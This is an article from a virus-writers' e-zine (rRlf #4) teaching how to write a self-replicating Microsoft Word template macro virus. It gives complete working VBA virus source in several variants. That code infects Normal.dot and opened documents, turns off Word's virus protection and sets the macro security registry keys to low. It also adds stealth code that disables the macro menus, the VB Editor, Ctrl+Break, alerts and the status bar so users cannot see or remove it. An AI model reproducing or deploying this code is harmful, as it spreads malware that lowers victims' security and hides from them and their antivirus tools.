rRlf #4

Redemption
Last article	Table of contents	Next article
Programming a Template Macro virus in MS Word by Zed
If you are familiar with VB/VBScript/VBA or any other VB-based program,
you shouldn't have too much trouble understanding the way macro viruses
work.

Before I get started on the code, I am going to briefly explain how
MS Word Macro viruses work, and the problem with Import/Export
Macro viruses.

Most MS Word Macro viruses work by infecting the Normal Template
(usually Normal.dot) and attach themselves to what ever document that
gets opened or closed.
Usually a Templates' default name is 'ThisDocument'.

Another thing that most newbie macro virus programmers do is make a
macro virus that imports and exports its own code to a particular
directory in the system. For example, they make a macro virus that
exports its code to the C:\WINDOWS folder, and imports it into other
documents when they are opened or closed.

The problem with this is that the C:\WINDOWS directory might not exist,
or nothing can be changed in the C:\WINDOWS directory (no editing,
moving, creating or deleting of files).

There is a solution that you can do for this. You can make a macro
virus that 'string infects' other documents. This is done by the macro
copying itself directly from one location to another, without importing
or exporting itself. This could possibly allow your macro virus to run
on a Macintosh. Macro viruses that String infect have more chances in
survival than import/export macro viruses.

Also note that there are many ways to program a macro virus. Macro
viruses can be in a Module, Class Module, or a Template form.
My favourite form of macro virus coding is a Template macro virus that
String infects.

Here is a basic code of a macro virus that string infects:

' -----------------------------------------------------------
Private Sub Document_Open()
On Error Resume Next

Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False

K1 = "HKEY_CURRENT_USER\Software\Microsoft\Office\"
K2 = Application.Version & "\Word\Security"
For RegLoop = 0 To 1
KeyArray = Array("Level", "AccessVBOM")
System.PrivateProfileString("", K1 & K2, KeyArray(RegLoop)) = 1&
Next RegLoop

Set DTemplate = ActiveDocument.VBProject.VBComponents(1)
Set NTemplate = NormalTemplate.VBProject.VBComponents(1)
Set DTCode = DTemplate.CodeModule
Set NTCode = NTemplate.CodeModule

If NTemplate.Name <> "MacroTest" Then
NTCode.DeleteLines 1, NTCode.CountOfLines
NTCode.InsertLines 1, DTCode.Lines(1, DTCode.CountOfLines)
NTemplate.Name = "MacroTest"
End If

If DTemplate.Name <> "MacroTest" Then
DTCode.DeleteLines 1, DTCode.CountOfLines
DTCode.InsertLines 1, NTCode.Lines(1, NTCode.CountOfLines)
DTemplate.Name = "MacroTest"
End If

LeftName = Left(ActiveDocument.Name, 8)
RightName = Right(ActiveDocument.Name, 1)
If LeftName = "Document" And IsNumeric(RightName) = True Then
ActiveDocument.Saved = True
Else
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
End Sub
' ------------------------[Code Ends]------------------------

This macro virus does the following (in steps):

1) Activates on opening of the infected document (duh really)

2) Attempts to set MS Word security to low, so that all macros will
   automatically run without the users knowledge.

3) Checks to see if the Normal Templates value name is 'MacroTest'
   (If it's name is not 'MacroTest', It will infect the Normal Template
   and change it's name to 'MacroTest')

4) Checks to see if the accessed documents macro value name
   is 'MacroTest' (If it's name is not 'MacroTest', It will
   infect the accessed documents template, and change it's
   Template value name to 'MacroTest')

5) Determines if the document exists on the drive (eg. If it hasn't
   been saved, it would have a name like 'Document1').
   If the document exists, it will save the document.


For those who don't understand some of the coding that I used above,
I will explain in steps, what techniques the macro virus uses.


Step 1: Disabling AntiVirus security
------------------------------------

If an AntiVirus scanner is installed, it usually uses MS Word
protection when a word document is opened or closed. This code below
will help avoid the AntiVirus scanner from scanning the rest of the
document:
' ---------------------------------------------------------------------
Options.VirusProtection = False
' ---------------------------------------------------------------------
So this code above basically attempts to stop the AntiVirus scanners
MS Word protection techniques.


Step 2: Stopping the Normal prompt message
------------------------------------------

There is nothing worse for your macro virus to do than to let the user
know that the macro virus exists itself. If you modify the Normal
Template in any way, it will display a message saying that the Normal
Template has been modified, and if you would like to save the changes
or not. Of course, we want to save the macro virus code into the
Normal Template without the users knowledge. We can turn this
'Save Normal Prompt' message off by typing the following:
' ---------------------------------------------------------------------
Options.SaveNormalPrompt = False
' ---------------------------------------------------------------------
Basically, this code above just automatically saves changes that the
macro virus did to the Normal Template without prompting the user
to save it or not.


Step 3: Stopping the 'Save changes' message
-------------------------------------------

This is another annoying message that will display itself if the
document is not saved. For example, the macro virus has just infected
the accessed document. When it infects the document, MS Word notices
that the document has been modified, so it displays a message saying
someting like 'are you sure you want to save this document?'.
You can stop this message by typing the following:
' ---------------------------------------------------------------------
Options.ConfirmConversions = False
' ---------------------------------------------------------------------
So basically, this code just tells MS Word 'not to care' about the
document changes, and just to save them anyway.


Step 4: Setting MS Word Macro Security to LOW
---------------------------------------------

There are three options that your MS Word security can be on:
High, Medium or Low security.
The MS Word security settings are usually on High, which means that
no macro can run unless it added to the 'trusted sources' list.
If the macro security level is on Medium, it means that the user has
a choice to run the macro or not.
If the security is on Low, it means that all macros will run
regardless if they contain macro viruses or not. Most macro viruses
will lower the MS Word security level to avoid the
'this document contains macros' message, which means the user doesn't
know that there actually is a macro inside the document.
You can set the MS Word security level to low by using this code below:
' ---------------------------------------------------------------------
K1 = "HKEY_CURRENT_USER\Software\Microsoft\Office\"
K2 = Application.Version & "\Word\Security"
For RegLoop = 0 To 1
KeyArray = Array("Level", "AccessVBOM")
System.PrivateProfileString("", K1 & K2, KeyArray(RegLoop)) = 1&
Next RegLoop
' ---------------------------------------------------------------------
The code above sets the registry keys 'Level' and 'AccessVBOM' to
the value of '1', which means it sets the MS Word security to Low.


Step 5: Normal Template/Accessed Document infecting
---------------------------------------------------

When a macro virus infects a template, it will delete the existing code
in it (if there is any), and it will repace it with its own code.
Here is a code that infects both the Normal and active document
Tempates:
' ---------------------------------------------------------------------
Set DTemplate = ActiveDocument.VBProject.VBComponents(1)
Set NTemplate = NormalTemplate.VBProject.VBComponents(1)
Set DTCode = DTemplate.CodeModule
Set NTCode = NTemplate.CodeModule

If NTemplate.Name <> "MacroTest" Then
NTCode.DeleteLines 1, NTCode.CountOfLines
NTCode.InsertLines 1, DTCode.Lines(1, DTCode.CountOfLines)
NTemplate.Name = "MacroTest"
End If

If DTemplate.Name <> "MacroTest" Then
DTCode.DeleteLines 1, DTCode.CountOfLines
DTCode.InsertLines 1, NTCode.Lines(1, NTCode.CountOfLines)
DTemplate.Name = "MacroTest"
End If
' ---------------------------------------------------------------------
This code above checks the name of the Template that it is
about to infect. If it doesn't have the name 'MacroTest', it will
delete the code of the Template (if there is any), and it will write
its own code into the Template.


Step 6: Saving the document
---------------------------

Saving the accessed document that the macro virus has just infected is
very important for the macro virus. If the macro virus
infects the document but does not save it, it will display a message
saying something like 'save changes to Document1' even though the
user has not made any changes to that document. This is another thing
that a macro virus has to have inside it. It has to determine if the
document exists on the drive (eg. If the document has not been saved,
it would usually have a name like 'Document1').
Here is the code on how to do this:
' ---------------------------------------------------------------------
LeftName = Left(ActiveDocument.Name, 8)
RightName = Right(ActiveDocument.Name, 1)
If LeftName = "Document" And IsNumeric(RightName) = True Then
ActiveDocument.Saved = True
Else
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
' ---------------------------------------------------------------------
So basically, the code above just determines if the document exists on
the drive. If the document does exist, it will save it. If the document
does not exist, it will discard the document and not save it.


Hehehe... so that is how a basic MS Word Template macro virus works.
I will now explain a few more macro tips that I did not include above:


Macro Execution
---------------

Your macro virus can execute on the opening or closing of the document.
If you want your macro virus to run on the opening of the document,
type the following as the macro virus sub name:
' ---------------------------------------------------------------------
Private Sub Document_Open()
' ---------------------------------------------------------------------
The code above will make the macro run on the opening of the document.
It is also possible to make the macro run on the closing
of the document by typing the following as the macro virus sub name:
' ---------------------------------------------------------------------
Private Sub Document_Close()
' ---------------------------------------------------------------------
The code above will make the macro run on the closing of the document.
It is also possible to have a macro virus that runs on both opening and
closing of documents. To do this you will have to modify the
'Normal Template/Accessed Document infecting' in step 5 to something
like this:
' ---------------------------------------------------------------------
Set DTemplate = ActiveDocument.VBProject.VBComponents(1)
Set NTemplate = NormalTemplate.VBProject.VBComponents(1)
Set DTCode = DTemplate.CodeModule
Set NTCode = NTemplate.CodeModule

If NTemplate.Name <> "MacroTest" Then
NTCode.DeleteLines 1, NTCode.CountOfLines
NTCode.InsertLines 1, DTCode.Lines(1, DTCode.CountOfLines)
NTCode.ReplaceLine 1, "Private Sub Document_Close()"
NTemplate.Name = "MacroTest"
End If

If DTemplate.Name <> "MacroTest" Then
DTCode.DeleteLines 1, DTCode.CountOfLines
DTCode.InsertLines 1, NTCode.Lines(1, NTCode.CountOfLines)
DTCode.ReplaceLine 1, "Private Sub Document_Open()"
DTemplate.Name = "MacroTest"
End If
' ---------------------------------------------------------------------
The above code has two extra lines in it than the
'Normal Template/Accessed Document infecting' code. The code above uses
the 'ReplaceLine' function to replace the first line of code in the
macro virus. The first line of code in the macro virus was
'Private Sub Document_Open()'. This code above works in exactly the
same way as the 'Normal Template/Accessed Document infecting', but it
replaces the first line of its own code 'Private Sub Document_Close()'
When it infects the Normal Template, so the Normal Template infects
documents on close whereas the other infected documents infect other
documents on the opening of itself.


Stealth technique: Disabling macro-accessible menus
---------------------------------------------------

Some macro viruses disable the command bars that lets a user get access
to the macro code. The macro viruses do this because they don't want
the user to delete the macro virus from the Normal Template.
Here is a code sample below that will disalble some well known macro
accessable menus:
' ---------------------------------------------------------------------
With CommandBars("Tools")
.Controls("Macro").Enabled = False
.Controls("Templates and Add-Ins...").Enabled = False
.Controls("Customize...").Enabled = False
End With
With CommandBars("View")
.Controls("Toolbars").Enabled = False
.Controls("Status Bar").Enabled = False
End With
With CommandBars("Macro")
.Controls("Macros...").Enabled = False
.Controls("Security...").Enabled = False
End With
With CommandBars("Format")
.Controls("Style...").Enabled = False
End With
' ---------------------------------------------------------------------

Self Recognition
----------------

Obviously, when macro viruses infect other documents, it needs to check
if that document is already infected. A macro virus needs some sort
of way on determining if another document already has its macro code
inside its Template.
Here are some obvious ways of macro self recognition:

1) Template name
2) Code line (A specific string of code in the macro virus itself)
3) Count of lines (the macro viruses total number of code lines)

Most macro viruses use the self recognition technique when they are
about to infect another document. They obviously do this to see if the
document it is about to infect is already infected.

I will now explain how to code come self recognition codes. The
self recognition technique is another version
of Step 5 'Normal Template/Accessed Document infecting'.


Here is a macro virus that uses the template name as its self
recognition:
' ---------------------------------------------------------------------
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False

K1 = "HKEY_CURRENT_USER\Software\Microsoft\Office\"
K2 = Application.Version & "\Word\Security"
For RegLoop = 0 To 1
KeyArray = Array("Level", "AccessVBOM")
System.PrivateProfileString("", K1 & K2, KeyArray(RegLoop)) = 1&
Next RegLoop

Set DTemplate = ActiveDocument.VBProject.VBComponents(1)
Set NTemplate = NormalTemplate.VBProject.VBComponents(1)
Set DTCode = DTemplate.CodeModule
Set NTCode = NTemplate.CodeModule

If NTemplate.Name <> "Hello" Then
NTCode.DeleteLines 1, NTCode.CountOfLines
NTCode.InsertLines 1, DTCode.Lines(1, DTCode.CountOfLines)
NTemplate.Name = "Hello"
End If

If DTemplate.Name <> "Hello" Then
DTCode.DeleteLines 1, DTCode.CountOfLines
DTCode.InsertLines 1, NTCode.Lines(1, NTCode.CountOfLines)
DTemplate.Name = "Hello"
End If

LeftName = Left(ActiveDocument.Name, 8)
RightName = Right(ActiveDocument.Name, 1)
If LeftName = "Document" And IsNumeric(RightName) = True Then
ActiveDocument.Saved = True
Else
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
End Sub
' ---------------------------------------------------------------------
This code above basically checks to see if the documents Template name
is 'Hello'. If the document Template does not have the name of 'Hello',
it will presume that the document is not infected. It will then infect
the document, and change its Template name to 'Hello'.


Here is the code of a macro virus that uses a specific code string as
its self recognition:
' ---------------------------------------------------------------------
Private Sub Document_Open()
On Error Resume Next
'WordMacro by Zed
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False

K1 = "HKEY_CURRENT_USER\Software\Microsoft\Office\"
K2 = Application.Version & "\Word\Security"
For RegLoop = 0 To 1
KeyArray = Array("Level", "AccessVBOM")
System.PrivateProfileString("", K1 & K2, KeyArray(RegLoop)) = 1&
Next RegLoop

Set DTCode = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set NTCode = NormalTemplate.VBProject.VBComponents(1).CodeModule

If NTCode.Lines(3, 1) <> "'WordMacro by Zed" Then
NTCode.DeleteLines 1, NTCode.CountOfLines
NTCode.InsertLines 1, DTCode.Lines(1, DTCode.CountOfLines)
End If

If DTCode.Lines(3, 1) <> "'WordMacro by Zed" Then
DTCode.DeleteLines 1, DTCode.CountOfLines
DTCode.InsertLines 1, NTCode.Lines(1, NTCode.CountOfLines)
End If

LeftName = Left(ActiveDocument.Name, 8)
RightName = Right(ActiveDocument.Name, 1)
If LeftName = "Document" And IsNumeric(RightName) = True Then
ActiveDocument.Saved = True
Else
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
End Sub
' ---------------------------------------------------------------------
This code above is a macro virus that searches for the third line
of another documents Template. If the Template does not have the code
line "'WordMacro by Zed" for the third line of its code, the macro
virus will presume that the document is not infected. It would then
infect the Template.


Here is a macro virus that uses its own count of code lines as its own
self recognition:
' ---------------------------------------------------------------------
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False

K1 = "HKEY_CURRENT_USER\Software\Microsoft\Office\"
K2 = Application.Version & "\Word\Security"
For RegLoop = 0 To 1
KeyArray = Array("Level", "AccessVBOM")
System.PrivateProfileString("", K1 & K2, KeyArray(RegLoop)) = 1&
Next RegLoop

Set DTCode = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set NTCode = NormalTemplate.VBProject.VBComponents(1).CodeModule

If NTCode.CountOfLines <> DTCode.CountOfLines Then
NTCode.DeleteLines 1, NTCode.CountOfLines
NTCode.InsertLines 1, DTCode.Lines(1, DTCode.CountOfLines)
End If

If DTCode.CountOfLines <> NTCode.CountOfLines Then
DTCode.DeleteLines 1, DTCode.CountOfLines
DTCode.InsertLines 1, NTCode.Lines(1, NTCode.CountOfLines)
End If

LeftName = Left(ActiveDocument.Name, 8)
RightName = Right(ActiveDocument.Name, 1)
If LeftName = "Document" And IsNumeric(RightName) = True Then
ActiveDocument.Saved = True
Else
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
End Sub
' ---------------------------------------------------------------------
This code above is a macro virus that checks the count of lines of
another documents Template. If the Templates count of lines is not the
same as the infected Templates count of lines, it will presume the
other document is not infected. It would then infect the Template.
Basically, if a macro virus' count of lines was 99, it would check
another document Templates' count of lines. If its count of lines
isn't 99, it would presume its Template is not infected. It would
then infect the Template.


Finally, I will now explain some other stealth techniques for
Template macro viruses.

Here is a stealth technique that is rarely used in a macro virus.
This code below will avoid the Visual Basic Editor from being
shown:
' ---------------------------------------------------------------------
Application.ShowVisualBasicEditor = False
' ---------------------------------------------------------------------
Obviously, The Visual Basic Editor allows the user to view or make
changes to the macro virus code. If a user accesses the Visual Basic
Editor, they can delete the macro virus code from the Normal Template
or other infected documents. This code above does not stop the Visual
Basic Editor completely, it will avoid it from opening at the Start-up
of MS Word.


Here is another technique (not really for stealth) that stops the user
from pressing Ctrl+Break to stop the macro code from running:
' ---------------------------------------------------------------------
Application.EnableCancelKey = wdCancelDisabled
' ---------------------------------------------------------------------

Here is another code that is used to turn off screen updating. Screen
updating is a proccess that 'updates' what is happening in MS Word.
A macro virus doesn't want the user to see its background activities,
so it turns screen updadting off. Here is the code that turns
screen updating off:
' ---------------------------------------------------------------------
Application.ScreenUpdating = False
' ---------------------------------------------------------------------

Another good stealth technique that some macro viruses use is to turn
off the status bar. The status bar displays various captions, like
'Saving Doc1.doc' and alike. This obviously hides some of the macro
viruses proccesses. Here is the code that hides the MS Word status bar:
' ---------------------------------------------------------------------
Application.DisplayStatusBar = False
' ---------------------------------------------------------------------

Another good technique that a macro virus may use is to stop MS Word
from displaying annoying messages associated with macros while the
macro virus is running. This code below basically stops alert or error
messages that the macro virus may cause:
' ---------------------------------------------------------------------
Application.DisplayAlerts = False
' ---------------------------------------------------------------------

Well, that's about it for this tutorial.

Any questions, comments, etc. Email me.